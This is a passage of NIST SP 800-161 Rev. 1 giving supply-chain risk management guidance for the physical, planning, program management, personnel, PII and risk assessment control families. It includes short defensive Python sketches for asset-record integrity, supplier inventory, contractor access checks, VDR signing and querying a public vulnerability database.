locations. For example, enterprises should consider the manufacturing, warehousing, or distribution
locations of information system components that are critical for agency operations when planning for
alternative suppliers for these components.
Level(s): 1, 2, 3
Related Controls: CP-6, CP-7
PE-20 ASSET MONITORING AND TRACKING
Supplemental C-SCRM Guidance: The enterprise should, whenever possible and practical, use asset
location technologies to track systems and components transported between entities across the supply
chain, between protected areas, or in storage awaiting implementation, testing, maintenance, or disposal.
Methods include RFID, digital signatures, or blockchains. These technologies help protect against:
a. Diverting the system or component for counterfeit replacement;
b. The loss of confidentiality, integrity, or availability of the system or component function and data
(including data contained within the component and data about the component); and
c. Interrupting supply chain and logistics processes for critical components.
In addition to providing protection capabilities, asset location technologies also help gather data that can
be used for incident management.
Level(s): 2, 3
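As an illustrative sketch (digital signatures are one of several methods named above), asset-tracking records might be integrity-protected with a keyed hash so that tampering in transit or storage can be detected; the record fields and key handling are hypothetical:

# Illustrative sketch: integrity-protect asset location records so that
# tampering during transport or storage can be detected. Uses a shared
# HMAC key; record fields and key management are hypothetical.
import hmac
import hashlib
import json

def sign_record(record: dict, key: bytes) -> str:
    payload = json.dumps(record, sort_keys=True).encode("utf-8")
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def verify_record(record: dict, signature: str, key: bytes) -> bool:
    return hmac.compare_digest(sign_record(record, key), signature)

key = b"enterprise-managed-secret"      # in practice, from a key vault
record = {"asset_id": "ENT-000123", "location": "Receiving Dock 4",
          "timestamp": "2025-01-15T10:30:00Z"}
sig = sign_record(record, key)
assert verify_record(record, sig, key)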
PE-23 FACILITY LOCATION
Supplemental C-SCRM Guidance: Enterprises should incorporate the facility location (e.g., data centers)
when assessing risks associated with suppliers. Factors may include geographic location (e.g., Continental
United States [CONUS], Outside the Continental United States [OCONUS]), physical protections in place
at one or more of the relevant facilities, local management and control of such facilities, environmental
hazard potential (e.g., located in a high-risk seismic zone), and alternative facility locations. Enterprises
should also assess whether the location of a manufacturing or distribution center could be influenced by
geopolitical, economic, or other factors. For critical vendors or products, enterprises should specifically
address any requirements or restrictions concerning the facility locations of the vendors (or their upstream
supply chain providers) in contracts and flow down this requirement to relevant sub-level contractors.
Level(s): 2, 3
Related Controls: SA-9(8)
FAMILY: PLANNING
[FIPS 200] specifies the Planning minimum security requirement as follows:
Organizations must develop, document, periodically update, and implement security
plans for organizational information systems that describe the security controls in place
or planned for the information systems and the rules of behavior for individuals
accessing the information systems.
C-SCRM should influence security planning, including activities such as security architecture,
coordination with other enterprise entities, and development of System Security Plans. When
acquiring products and services from suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers, enterprises may be sharing
facilities with those enterprises, have employees of these entities on the enterprise’s premises, or
use information systems that belong to those entities. In these and other applicable situations,
enterprises should coordinate their security planning activities with these entities to ensure
appropriate protection of an enterprise’s processes, information systems, and systems and
components traversing the supply chain. When establishing security architectures, enterprises
should provide for component and supplier diversity to manage cybersecurity risks throughout
the supply chain, including suppliers going out of business or stopping the production of specific
components. Finally, as stated in Section 2 and Appendix C, enterprises should integrate C-
SCRM controls into their Risk Response Frameworks (Level 1 and Level 2) as well as their C-
SCRM Plans (Level 3).
PL-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The security planning policy and procedures should integrate C-SCRM.
This includes creating, disseminating, and updating the security policy, operational policy, and procedures
for C-SCRM to shape acquisition or development requirements and the follow-on implementation,
operations, and maintenance of systems, system interfaces, and network connections. The C-SCRM policy
and procedures provide inputs into and take guidance from the C-SCRM Strategy and Implementation Plan
at Level 1 and the System Security Plan and C-SCRM plan at Level 3. In Level 3, ensure that the full
SDLC is covered from the C-SCRM perspective.
Level(s): 2
Related Controls: PL-2, PM-30
PL-2 SYSTEM SECURITY AND PRIVACY PLANS
Supplemental C-SCRM Guidance: The system security plan (SSP) should integrate C-SCRM. The
enterprise may choose to develop a stand-alone C-SCRM plan for an individual system or integrate SCRM
controls into their SSP. The system security plan and/or system-level C-SCRM plan provide inputs into and
take guidance from the C-SCRM Strategy and Implementation Plan at Level 1 and the C-SCRM policy at
Level 1 and Level 2. In addition to internal coordination, the enterprise should coordinate with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers to develop and maintain their SSPs. For example, building and operating a system requires
significant coordination and collaboration between the enterprise and system integrator personnel. Such
coordination and collaboration should be addressed in the system security plan or stand-alone C-SCRM
plan. These plans should also consider that suppliers or external service providers may not be able to
customize to the acquirer’s requirements. It is recommended that suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers also develop C-SCRM plans
for non-federal (i.e., contractor) systems that are processing federal agency information and flow down this
requirement to relevant sub-level contractors.
Section 2, Appendix C, and Appendix D provide guidance on C-SCRM strategies, policies, and plans.
Controls in this publication (NIST SP 800-161, Rev. 1) should be used for the C-SCRM portion of the SSP.
Level(s): 3
Related Controls: PM-30
PL-4 RULES OF BEHAVIOR
Supplemental C-SCRM Guidance: The rules of behavior apply to contractor personnel and internal agency
personnel. Contractor enterprises are responsible for ensuring that their employees follow applicable rules
of behavior. Individual contractors should not be granted access to agency systems or data until they have
acknowledged and demonstrated compliance with this control. Failure to meet this control can result in the
removal of access for such individuals.
Level(s): 2, 3
PL-7 CONCEPT OF OPERATIONS
Supplemental C-SCRM Guidance: The concept of operations (CONOPS) should describe how the
enterprise intends to operate the system from the perspective of C-SCRM. It should integrate C-SCRM and
be managed and updated throughout the applicable system’s SDLC to address cybersecurity risks
throughout the supply chain.
Level(s): 3
PL-8 SECURITY AND PRIVACY ARCHITECTURES
Supplemental C-SCRM Guidance: Security and privacy architecture defines and directs the implementation
of security and privacy-protection methods, mechanisms, and capabilities to the underlying systems and
networks, as well as the information system that is being created. Security architecture is fundamental to C-
SCRM because it helps to ensure that security is built-in throughout the SDLC. Enterprises should consider
implementing zero-trust architectures and should ensure that the security architecture is well understood by
system developers/engineers and system security engineers. This control applies to both federal agency and
non-federal agency employees.
Level(s): 2, 3
Control Enhancement(s):
(1) SECURITY AND PRIVACY ARCHITECTURES | SUPPLIER DIVERSITY
Supplemental C-SCRM Guidance: Supplier diversity provides options for addressing information
security and supply chain concerns. The enterprise should incorporate this control as it relates to
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
The enterprise should plan for the potential replacement of suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers in case one is no longer
able to meet the enterprise’s requirements (e.g., company goes out of business or does not meet
contractual obligations). Where applicable, contracts should be worded so that different parts can be
replaced with a similar model with similar prices from a different manufacturer if certain events occur
(e.g., obsolescence, poor performance, production issues, etc.).
Incorporate supplier diversity for off-the-shelf (commercial or government) components during
acquisition security assessments. The evaluation of alternatives should include, for example, feature
parity, interoperability, commodity components, and the ability to provide multiple delivery paths. For
example, having the source code, build scripts, and tests for a software component could enable an
enterprise to assign someone else to maintain it, if necessary.
Level(s): 2, 3
PL-9 CENTRAL MANAGEMENT
Supplemental C-SCRM Guidance: C-SCRM controls are managed centrally at Level 1 through the C-
SCRM Strategy and Implementation Plan and at Level 1 and Level 2 through the C-SCRM Policy. The
C-SCRM PMO described in Section 2 centrally manages C-SCRM controls at Level 1 and Level 2. At
Level 3, C-SCRM controls are managed on an information system basis through the SSP and/or C-
SCRM Plan.
Level(s): 1, 2
PL-10 BASELINE SELECTION
Supplemental C-SCRM Guidance: Enterprises should include C-SCRM controls in their control
baselines. Enterprises should identify and select C-SCRM controls based on the C-SCRM
requirements identified within each of the levels. A C-SCRM PMO may assist in identifying C-SCRM
control baselines that meet common C-SCRM requirements for different groups, communities of
interest, or the enterprise as a whole.
Level(s): 1, 2
FAMILY: PROGRAM MANAGEMENT
[FIPS 200] does not specify Program Management minimum security requirements.
[NIST SP 800-53, Rev. 5] states that “the program management controls…are implemented at
the enterprise level and not directed at individual information systems.” Those controls apply to
the entire enterprise (i.e., federal agency) and support the enterprise’s overarching information
security program. Program management controls support and provide input and feedback to
enterprise-wide C-SCRM activities.
All program management controls should be applied in a C-SCRM context. Within federal
agencies, the C-SCRM PMO function or similar is responsible for implementing program
management controls. Section 3 provides guidance on the C-SCRM PMO and its functions and
responsibilities.
PM-2
INFORMATION SECURITY PROGRAM LEADERSHIP ROLE
Supplemental C-SCRM Guidance: The senior information security officer (e.g., CISO) and senior agency
official responsible for acquisition (e.g., Chief Acquisition Officer [CAO] or Senior Procurement Executive
[SPE]) have key responsibilities for C-SCRM and the overall cross-enterprise coordination and
collaboration with other applicable senior personnel within the enterprise, such as the CIO, the head of
facilities/physical security, and the risk executive (function). This coordination should occur regardless of
the specific department and agency enterprise structure and specific titles of relevant senior personnel. The
coordination could be executed by the C-SCRM PMO or another similar function. Section 2 provides more
guidance on C-SCRM roles and responsibilities.
Level(s): 1, 2
PM-3
INFORMATION SECURITY AND PRIVACY RESOURCES
Supplemental C-SCRM Guidance: An enterprise’s C-SCRM program requires dedicated, sustained funding
and human resources to successfully implement agency C-SCRM requirements. Section 3 of this document
provides guidance on dedicated funding for C-SCRM programs. The enterprise should also integrate C-
SCRM requirements into major IT investments to ensure that funding is appropriately allocated through the
capital planning and investment request process. For example, should an RFID infrastructure be required to
enhance C-SCRM to secure and improve the inventory or logistics management efficiency of the
enterprise’s supply chain, appropriate IT investments would likely be required to ensure successful
planning and implementation. Other examples include any investment into the development or test
environment for critical components. In such cases, funding and resources are needed to acquire and
maintain appropriate information systems, networks, and components to meet specific C-SCRM
requirements that support the mission.
Level(s): 1, 2
PM-4
PLAN OF ACTION AND MILESTONES PROCESS
Supplemental C-SCRM Guidance: C-SCRM items should be included in the POA&M at all levels.
Organizations should develop POA&Ms based on C-SCRM assessment reports. POA&Ms should be used
by organizations to describe planned actions to correct deficiencies in C-SCRM controls identified
during assessments and to continuously monitor progress against those actions.
Level(s): 2, 3
Related Controls: CA-5, PM-30
PM-5
SYSTEM INVENTORY
Supplemental C-SCRM Guidance: Having a current system inventory is foundational for C-SCRM. Not
having a system inventory may lead to the enterprise’s inability to identify system and supplier criticality,
which would result in an inability to conduct C-SCRM activities. To ensure that all applicable suppliers are
identified and categorized for criticality, enterprises should include relevant supplier information in the
system inventory and maintain its currency and accuracy. Enterprises should require their prime contractors
to implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
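As an illustration of carrying supplier information in the system inventory, the following minimal sketch defines a hypothetical inventory record in Python. The field names are assumptions for illustration only, not a format defined by this publication.

import hashlib  # not required here; shown records are plain data
from dataclasses import dataclass, field

@dataclass
class SystemInventoryRecord:
    system_id: str
    system_name: str
    criticality: str                 # e.g., "high", "moderate", "low"
    prime_contractor: str
    suppliers: list[str] = field(default_factory=list)  # relevant sub-tier suppliers
    last_verified: str = ""          # supports maintaining currency and accuracy

record = SystemInventoryRecord(
    system_id="SYS-0042",            # hypothetical identifiers and names
    system_name="Logistics Tracking",
    criticality="high",
    prime_contractor="Example Integrator Inc.",
    suppliers=["Acme Components", "Widget Labs"],
    last_verified="2023-01-15",
)
print(record)

A record of this kind allows supplier criticality analyses to be driven directly from the inventory rather than assembled ad hoc.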
Level(s): 2, 3
PM-6
MEASURES OF PERFORMANCE
Supplemental C-SCRM Guidance: Enterprises should use measures of performance to track the
implementation, efficiency, effectiveness, and impact of C-SCRM activities. The C-SCRM PMO is
responsible for creating C-SCRM measures of performance in collaboration with other applicable
stakeholders to include identifying the appropriate audience and decision makers and providing guidance
on data collection, analysis, and reporting.
Level(s): 1, 2
PM-7
ENTERPRISE ARCHITECTURE
Supplemental C-SCRM Guidance: C-SCRM should be integrated when designing and maintaining
enterprise architecture.
Level(s): 1, 2
PM-8
CRITICAL INFRASTRUCTURE PLAN
Supplemental C-SCRM Guidance: C-SCRM should be integrated when developing and maintaining a critical
infrastructure plan.
Level(s): 1
PM-9
RISK MANAGEMENT STRATEGY
Supplemental C-SCRM Guidance: The risk management strategy should address cybersecurity risks
throughout the supply chain. Section 2, Appendix C, and Appendix D of this document provide guidance
on integrating C-SCRM into the risk management strategy.
Level(s): 1
PM-10 AUTHORIZATION PROCESS
Supplemental C-SCRM Guidance: C-SCRM should be integrated when designing and implementing
authorization processes.
Level(s): 1, 2
PM-11 MISSION AND BUSINESS PROCESS DEFINITION
Supplemental C-SCRM Guidance: The enterprise’s mission and business processes should address
cybersecurity risks throughout the supply chain. When addressing mission and business process definitions,
the enterprise should ensure that C-SCRM activities are incorporated into the support processes for
achieving mission success. For example, a system supporting a critical mission function that has been
designed and implemented for easy removal and replacement should a component fail may require the use
of somewhat unreliable hardware components. A C-SCRM activity may need to be defined to ensure that
the supplier makes component spare parts readily available if a replacement is needed.
Level(s): 1, 2, 3
PM-12 INSIDER THREAT PROGRAM
Supplemental C-SCRM Guidance: An insider threat program should include C-SCRM and be tailored for
both federal and non-federal agency individuals who have access to agency systems and networks. This
control applies to contractors and subcontractors and should be implemented throughout the SDLC.
Level(s): 1, 2, 3
PM-13 SECURITY AND PRIVACY WORKFORCE
Supplemental C-SCRM Guidance: Security and privacy workforce development and improvement should
ensure that relevant C-SCRM topics are integrated into the content and initiatives produced by the program.
Section 2 provides information on C-SCRM roles and responsibilities. NIST SP 800-161 can be used as a
source of topics and activities to include in the security and privacy workforce program.
Level(s): 1, 2
PM-14 TESTING, TRAINING, AND MONITORING
Supplemental C-SCRM Guidance: The enterprise should implement a process to ensure that organizational
plans for conducting supply chain risk testing, training, and monitoring activities associated with
organizational systems are maintained. The C-SCRM PMO can provide guidance and support on how to
integrate C-SCRM into testing, training, and monitoring plans.
Level(s): 1, 2
PM-15 SECURITY AND PRIVACY GROUPS AND ASSOCIATIONS
Supplemental C-SCRM Guidance: Contact with security and privacy groups and associations should
include C-SCRM practitioners and those with C-SCRM responsibilities. Acquisition, legal, critical
infrastructure, and supply chain groups and associations should be incorporated. The C-SCRM PMO can
help identify agency personnel who could benefit from participation, specific groups to participate in, and
relevant topics.
Level(s): 1, 2
PM-16 THREAT AWARENESS PROGRAM
Supplemental C-SCRM Guidance: A threat awareness program should include threats that emanate from
the supply chain. When addressing supply chain threat awareness, knowledge should be shared between
stakeholders within the boundaries of the enterprise’s information sharing policy. The C-SCRM PMO can
help identify C-SCRM stakeholders to include in threat information sharing, as well as potential sources of
information for supply chain threats.
Level(s): 1, 2
PM-17 PROTECTING CONTROLLED UNCLASSIFIED INFORMATION ON EXTERNAL SYSTEMS
Supplemental C-SCRM Guidance: The policy and procedures for controlled unclassified information (CUI)
on external systems should include protecting relevant supply chain information. Conversely, it should
include protecting agency information that resides in external systems because such external systems are
part of the agency supply chain.
Level(s): 2
PM-18 PRIVACY PROGRAM PLAN
Supplemental C-SCRM Guidance: The privacy program plan should include C-SCRM. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors.
Level(s): 1, 2
PM-19 PRIVACY PROGRAM LEADERSHIP ROLE
Supplemental C-SCRM Guidance: The privacy program leadership role should be included as a stakeholder
in applicable C-SCRM initiatives and activities.
Level(s): 1
PM-20 DISSEMINATION OF PRIVACY PROGRAM INFORMATION
Supplemental C-SCRM Guidance: The dissemination of privacy program information should be protected
from cybersecurity risks throughout the supply chain.
Level(s): 1, 2
PM-21 ACCOUNTING OF DISCLOSURES
Supplemental C-SCRM Guidance: An accounting of disclosures should be protected from cybersecurity
risks throughout the supply chain.
Level(s): 1, 2
PM-22 PERSONALLY IDENTIFIABLE INFORMATION QUALITY MANAGEMENT
Supplemental C-SCRM Guidance: Personally identifiable information (PII) quality management should
take into account and manage cybersecurity risks related to PII throughout the supply chain.
Level(s): 1, 2
PM-23 DATA GOVERNANCE BODY
Supplemental C-SCRM Guidance: The data governance body is a stakeholder in C-SCRM and should be
included in cross-agency collaboration and information sharing of C-SCRM activities and initiatives (e.g.,
by participating in inter-agency bodies, such as the FASC).
Level(s): 1
PM-25 MINIMIZATION OF PERSONALLY IDENTIFIABLE INFORMATION USED IN TESTING,
TRAINING, AND RESEARCH
Supplemental C-SCRM Guidance: Supply chain-related cybersecurity risks to personally identifiable
information should be addressed by the minimization policies and procedures described in this control.
Level(s): 2
PM-26 COMPLAINT MANAGEMENT
Supplemental C-SCRM Guidance: The complaint management process and mechanisms should be protected
from cybersecurity risks throughout the supply chain. Enterprises should also integrate C-SCRM security
and privacy controls when fielding complaints from vendors or the general public (e.g., departments and
agencies fielding inquiries related to exclusions and removals).
Level(s): 2, 3
PM-27 PRIVACY REPORTING
Supplemental C-SCRM Guidance: The privacy reporting process and mechanisms should be protected from
cybersecurity risks throughout the supply chain.
Level(s): 2, 3
PM-28 RISK FRAMING
Supplemental C-SCRM Guidance: C-SCRM should be included in risk framing. Section 2 and Appendix C
provide detailed guidance on integrating C-SCRM into risk framing.
Level(s): 1
PM-29 RISK MANAGEMENT PROGRAM LEADERSHIP ROLES
Supplemental C-SCRM Guidance: Risk management program leadership roles should include C-SCRM
responsibilities and be included in C-SCRM collaboration across the enterprise. Section 2 and Appendix C
provide detailed guidance for C-SCRM roles and responsibilities.
Level(s): 1
PM-30 SUPPLY CHAIN RISK MANAGEMENT STRATEGY
Supplemental C-SCRM Guidance: The Supply Chain Risk Management Strategy (also known as C-SCRM
Strategy) should be complemented with a C-SCRM Implementation Plan that lays out detailed initiatives
and activities for the enterprise with timelines and responsible parties. This implementation plan can be a
POA&M or be included in a POA&M. Based on the C-SCRM Strategy and Implementation Plan at Level
1, the enterprise should select and document common C-SCRM controls that address enterprise,
program, and system-specific needs. These controls should be iteratively integrated into the C-SCRM
Policy at Level 1 and Level 2, as well as the C-SCRM plan (or SSP if required) at Level 3. See Section 2
and Appendix C for further guidance on risk management.
Level(s): 1, 2
Related Controls: PL-2
PM-31 CONTINUOUS MONITORING STRATEGY
Supplemental C-SCRM Guidance: The continuous monitoring strategy and program should integrate C-
SCRM controls at Levels 1, 2, and 3 in accordance with the Supply Chain Risk Management Strategy.
Level(s): 1, 2, 3
Related Controls: PM-30
PM-32 PURPOSING
Supplemental C-SCRM Guidance: Extending systems assigned to support specific mission or business
functions beyond their initial purpose subjects those systems to unintentional risks, including cybersecurity
risks throughout the supply chain. The application of this control should include the explicit incorporation
of cybersecurity supply chain exposures.
Level(s): 2, 3
FAMILY: PERSONNEL SECURITY
[FIPS 200] specifies the Personnel Security minimum security requirement as follows:
Organizations must: (i) ensure that individuals occupying positions of responsibility
within organizations (including third-party service providers) are trustworthy and meet
established security criteria for those positions; (ii) ensure that organizational
information and information systems are protected during and after personnel actions
such as terminations and transfers; and (iii) employ formal sanctions for personnel
failing to comply with organizational security policies and procedures.
Personnel who have access to an enterprise’s supply chain should be covered by the enterprise’s
personnel security controls. These personnel include acquisition and contracting professionals,
program managers, supply chain and logistics professionals, shipping and receiving staff,
information technology professionals, quality professionals, mission and business owners,
system owners, and information security engineers. Enterprises should also work with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers to ensure that they apply appropriate security controls to the personnel who
interact with the enterprise’s supply chain, as appropriate.
PS-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: At each level, the personnel security policy and procedures and the
related C-SCRM Strategy/Implementation Plan, C-SCRM Policies, and C-SCRM Plan(s) need to define the
roles for the personnel who are engaged in the acquisition, management, and execution of supply chain
security activities. These roles also need to state acquirer personnel responsibilities with regard to
relationships with suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. Policies and procedures need to consider the full system development
life cycle and the roles and responsibilities needed to address the various supply chain
infrastructure activities.
Level 1: Applicable roles include risk executive, CIO, CISO, contracting, logistics, delivery/receiving,
acquisition security, and other functions that provide supporting supply chain activities.
Level 2: Applicable roles include program executive and individuals (e.g., non-federal employees,
including contractors) within the acquirer enterprise who are responsible for program success (e.g.,
Program Manager and other individuals).
Level 3: Applicable roles include system engineers and system security engineers throughout the operational
system life cycle, from requirements definition through development, test, deployment, maintenance,
updates, replacement, and delivery/receiving, as well as IT.
Roles for the supplier, developer, system integrator, external system service provider, and other ICT/OT-
related service provider personnel responsible for the success of the program should be noted in an
agreement between the acquirer and these parties (e.g., contract).
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
Related Control(s): SA-4
PS-3
PERSONNEL SCREENING
Supplemental C-SCRM Guidance: To mitigate insider threat risk, personnel screening policies and
procedures should be extended to any contractor personnel with authorized access to information systems,
system components, or information system services. Continuous monitoring activities should be
commensurate with the contractor’s level of access to sensitive, classified, or regulated information and
should be consistent with broader enterprise policies. Screening requirements should be incorporated into
agreements and flow down to sub-tier contractors.
Level(s): 2, 3
PS-6
ACCESS AGREEMENTS
Supplemental C-SCRM Guidance: The enterprise should define and document access agreements for all
contractors or other external personnel who may need to access the enterprise’s data, systems, or network,
whether physically or logically. Access agreements should state the appropriate level and method of access
to the information system and supply chain network. Additionally, terms of access should be consistent
with the enterprise’s information security policy and may need to specify additional restrictions, such as
allowing access during specific timeframes, from specific locations, or only by personnel who have
satisfied additional vetting requirements. The enterprise should deploy audit mechanisms to review,
monitor, update, and track access by these parties in accordance with the access agreement. As personnel
vary over time, the enterprise should implement a timely and rigorous personnel security update process for
the access agreements.
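As a rough illustration of enforcing such restrictions, the sketch below checks a hypothetical access agreement's time window and source network before permitting access. The agreement fields, account name, and network range are assumptions for illustration; in practice, enforcement would live in the enterprise's identity and network access controls, not a standalone script.

from datetime import datetime, time
from ipaddress import ip_address, ip_network

agreement = {
    "account": "contractor-42",                           # hypothetical external account
    "allowed_hours": (time(8, 0), time(18, 0)),           # business hours only
    "allowed_networks": [ip_network("203.0.113.0/24")],   # vetted contractor site
}

def access_permitted(now: datetime, source_ip: str) -> bool:
    # Both the agreed timeframe and the agreed source location must hold.
    start, end = agreement["allowed_hours"]
    in_window = start <= now.time() <= end
    in_network = any(ip_address(source_ip) in net
                     for net in agreement["allowed_networks"])
    return in_window and in_network

print(access_permitted(datetime.now(), "203.0.113.25"))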
When information systems and network products and services are provided by an entity within the
enterprise, there may be an existing access agreement in place. When such an agreement does not exist, it
should be established.
NOTE: While the audit mechanisms may be implemented at Level 3, the agreement process with required
updates should be implemented at Level 2 as a part of program management activities.
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
PS-7
EXTERNAL PERSONNEL SECURITY
Supplemental C-SCRM Guidance: Third-party personnel who have access to the enterprise’s information
systems and networks must meet the same personnel security requirements as enterprise personnel.
Examples of such third-party personnel can include the system integrator, developer, supplier, external
service provider used for delivery, contractors or service providers who are using the ICT/OT systems, or
supplier maintenance personnel brought in to address component technical issues not solvable by the
enterprise or system integrator.
Level(s): 2
FAMILY: PERSONALLY IDENTIFIABLE INFORMATION PROCESSING AND
TRANSPARENCY
Personally identifiable information processing and transparency is a new control family
developed specifically to address PII processing and transparency concerns.
The enterprise should keep in mind that some suppliers have comprehensive security and privacy
practices and systems that may go above and beyond the enterprise’s requirements. Enterprises
should work with suppliers to understand the extent of their privacy practices and
how they meet the enterprise’s needs.
PT-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should ensure that supply chain concerns are included in PII
processing and transparency policies and procedures, as well as the related C-SCRM
Strategy/Implementation Plan, C-SCRM Policies, and C-SCRM Plan. The policy can be included as part of
the general security and privacy policy or can be represented by multiple policies.
The procedures can be established for the security and privacy program in general and individual
information systems. These policies and procedures should address the purpose, scope, roles, responsibilities,
management commitment, coordination among enterprise entities, and privacy compliance to support
systems/components within information systems or the supply chain.
Policies and procedures need to be in place to ensure that contracts state what PII will be shared,
which contractor personnel may have access to the PII, what controls protect the PII, how long it can be
kept, and what happens to it at the end of a contract.
a. When working with a new supplier, ensure that the agreement includes the most recent set of
applicable security requirements.
b. Contractors need to abide by relevant laws and policies regarding information (PII and other sensitive
information).
c. The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
FAMILY: RISK ASSESSMENT
[FIPS 200] specifies the Risk Assessment minimum security requirement as follows:
Organizations must periodically assess the risk to organizational operations (including
mission, functions, image, or reputation), organizational assets, and individuals,
resulting from the operation of organizational information systems and the associated
processing, storage, or transmission of organizational information.
This document provides guidance for managing an enterprise’s cybersecurity risk in supply
chains and expands this control to integrate assessments of cybersecurity risk in supply chains,
as described in Section 2 and Appendix C.
RA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Risk assessments should be performed at the enterprise,
mission/program, and operational levels. The system-level risk assessment should include both the supply
chain infrastructure (e.g., development and testing environments and delivery systems) and the information
system/components traversing the supply chain. System-level risk assessments significantly intersect with
the SDLC and should complement the enterprise’s broader RMF activities, which take part during the
SDLC. A criticality analysis will ensure that mission-critical functions and components are given higher
priority due to their impact on the mission, if compromised. The policy should include supply chain-
relevant cybersecurity roles that are applicable to performing and coordinating risk assessments across the
enterprise (see Section 2 for the listing and description of roles). Applicable roles within suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers should be defined.
Level(s): 1, 2, 3
RA-2
SECURITY CATEGORIZATION
Supplemental C-SCRM Guidance: Security categorization is critical to C-SCRM at Levels 1, 2, and 3. In
addition to [FIPS 199] categorization, security categorization for C-SCRM should be based on the
criticality analysis that is performed as part of the SDLC. See Section 2 and [NISTIR 8179] for a detailed
description of criticality analysis.
Level(s): 1, 2, 3
Related Controls: RA-9
RA-3
RISK ASSESSMENT
Supplemental C-SCRM Guidance: Risk assessments should include an analysis of criticality, threats,
vulnerabilities, likelihood, and impact, as described in detail in Appendix C. The data to be reviewed and
collected includes C-SCRM-specific roles, processes, and the results of system/component and services
acquisitions, implementation, and integration. Risk assessments should be performed at Levels 1, 2, and 3.
Risk assessments at higher levels should consist primarily of a synthesis of the risk assessments
performed at lower levels and be used to understand the overall impact at that level (e.g., at the
enterprise or mission/function level). C-SCRM risk assessments should complement and inform risk
assessments, which are performed as ongoing activities throughout the SDLC, and processes should be
appropriately aligned with or integrated into ERM processes and governance.
Level(s): 1, 2, 3
Related Control(s): RA-3(1)
RA-5
VULNERABILITY MONITORING AND SCANNING
Supplemental C-SCRM Guidance: Vulnerability monitoring should cover suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers in the
enterprise’s supply chain. This includes employing data collection tools to maintain a continuous state of
awareness about potential vulnerabilities of suppliers, as well as the information systems, system
components, and raw inputs that they provide through the cybersecurity supply chain. Vulnerability
monitoring activities should take place at all three levels of the enterprise. Scoping vulnerability monitoring
activities requires enterprises to consider suppliers as well as their sub-suppliers. Enterprises, where
applicable and appropriate, may consider providing customers with a Vulnerability Disclosure Report
(VDR) to demonstrate proper and complete vulnerability assessments for components listed in SBOMs.
The VDR should include the analysis and findings describing the impact (or lack of impact) that the
reported vulnerability has on a component or product. The VDR should also contain information on plans
to address the CVE. Enterprises should consider publishing the VDR within a secure portal available to
customers and signing the VDR with a trusted, verifiable private key, including a timestamp that indicates
the date and time of the signature and the associated VDR. Enterprises should also consider establishing
a separate notification channel for customers in cases where vulnerabilities arise that are not disclosed in
the VDR. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
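To make the signing and timestamping guidance above concrete, the following is a minimal, hypothetical sketch, not a format or mechanism specified by this publication. It hashes a VDR file, binds a UTC timestamp to the hash, and signs the result with an Ed25519 key via the Python cryptography package; the file names are assumptions, and key generation is inlined only for illustration (a real deployment would load an enterprise-managed key).

import hashlib
import json
from datetime import datetime, timezone
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Illustration only: a production key would come from an HSM or managed key store.
private_key = Ed25519PrivateKey.generate()

with open("vdr.json", "rb") as f:          # hypothetical VDR file name
    vdr_bytes = f.read()

# Bind the report hash and the signing time together so customers verify both at once.
envelope = {
    "vdr_sha256": hashlib.sha256(vdr_bytes).hexdigest(),
    "signed_at": datetime.now(timezone.utc).isoformat(),
}
payload = json.dumps(envelope, sort_keys=True).encode()
signature = private_key.sign(payload)

with open("vdr.sig.json", "w") as f:
    json.dump({"envelope": envelope, "signature": signature.hex()}, f, indent=2)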
Level(s): 2, 3
Control Enhancement(s):
VULNERABILITY MONITORING AND SCANNING | BREADTH AND DEPTH OF COVERAGE
Supplemental C-SCRM Guidance: Enterprises that monitor the supply chain for vulnerabilities should
express the breadth of monitoring based on the criticality and/or risk profile of the supplier or
product/component and the depth of monitoring based on the level of the supply chain at which the
monitoring takes place (e.g., sub-supplier). Where possible, a component inventory (e.g., hardware,
software) may aid enterprises in capturing the breadth and depth of the products/components within
their supply chain that may need to be monitored and scanned for vulnerabilities.
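As one illustration of using a component inventory to scope monitoring, the sketch below queries the public OSV vulnerability database (https://api.osv.dev) for each inventoried component, checking higher-criticality components first. The inventory structure is an assumption for illustration, and OSV is only one of several possible vulnerability sources.

import json
import urllib.request

inventory = [  # hypothetical component inventory with criticality tags
    {"name": "requests", "ecosystem": "PyPI", "version": "2.19.0", "criticality": "high"},
    {"name": "lodash", "ecosystem": "npm", "version": "4.17.20", "criticality": "low"},
]

# Breadth: scan every inventoried component; depth/priority: high criticality first.
for item in sorted(inventory, key=lambda c: c["criticality"] != "high"):
    query = {
        "package": {"name": item["name"], "ecosystem": item["ecosystem"]},
        "version": item["version"],
    }
    req = urllib.request.Request(
        "https://api.osv.dev/v1/query",
        data=json.dumps(query).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        vulns = json.load(resp).get("vulns", [])
    print(item["name"], item["version"], "->", [v["id"] for v in vulns])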
Level(s): 2, 3
VULNERABILITY MONITORING AND SCANNING | AUTOMATED TREND ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should track trends in vulnerabilities to components
within the supply chain over time. This information may help enterprises develop procurement
strategies that reduce risk exposure density within the supply chain.
Level(s): 2, 3
RA-7
RISK RESPONSE
